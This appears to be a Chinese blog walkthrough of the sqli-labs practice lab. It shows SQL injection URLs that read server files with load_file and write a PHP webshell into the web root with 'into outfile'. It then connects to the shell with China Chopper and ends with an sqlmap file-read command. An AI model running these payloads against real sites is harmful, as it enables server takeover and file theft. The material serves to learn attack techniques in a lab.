sql 上传文件 下载文件 一句话木马+菜刀 sqlmap

这里说的内容可能比较多  但是都需要  高的权限 能够 创建删除 文件~~~~   然后

先说一下 下载文件吧  

  我们构造的链接是

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=0' union select 1,load_file("D:\\flag.txt"),3 --+

然后  我们的内容 如下 

可以看出  flag 已经被我们输入到网址里面了   然后 

我们说 上传文件 

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-7/?id=-1'))  union select  1 , '' , 3   into  outfile "D:\\phpstudy\\PHPTutorial\\WWW\\sqli-labs-master\\sqli-labs-master\\Less-7\\1.php"  --+

然后 文件中就写入了  

1        3  

然后 我们经过服务器 运行之后 就会发现    成功运行 

 显示出了php的信息等  

然后   就是用一句话木马 和 菜刀连接了

用 

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-7/?id=-1'))  union select  1 , "" , 3   into  outfile "D:\\phpstudy\\PHPTutorial\\WWW\\sqli-labs-master\\sqli-labs-master\\Less-7\\4.php"  --+

然后  再用菜刀连接 

 如图  搞定成功  

下面就是用sqlmap  来 确定  搞一波

py -2  sqlmap.py -u  "http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-7/?id=1" --file-read "D:\\FLAG.txt" --batch

 找到那个文件夹 

 然后找到原本的文件 

一样一样的~~~~~~~~~~~~~~~ 

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！